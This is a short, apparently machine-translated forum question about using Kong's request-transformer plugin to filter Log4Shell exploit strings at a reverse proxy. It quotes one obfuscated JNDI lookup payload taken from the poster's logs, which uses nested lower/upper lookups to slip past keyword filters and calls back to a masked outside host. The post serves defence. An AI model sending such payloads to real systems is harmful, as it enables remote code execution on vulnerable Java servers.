Используйте обратный прокси-сервер Kong для фильтрации эксплойтов log4j

Я использую обратный прокси-сервер Kong для проксирования каждого HTTP-запроса к моим веб-серверам. Я хотел бы смягчить текущую проблему log4j (« log4shell »), найдя и заменив строки критических злоумышленников, такие как «jndi». Например, я нашел это в своих журналах:

${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback}

Я думаю, этого можно было бы добиться с помощью плагина преобразователя запросов . Кто-нибудь уже сделал это?

P.S. Просто заменаjndiкdisabledслишком далеко идущий и многое ломает.

0 ответов

Другие вопросы по тегам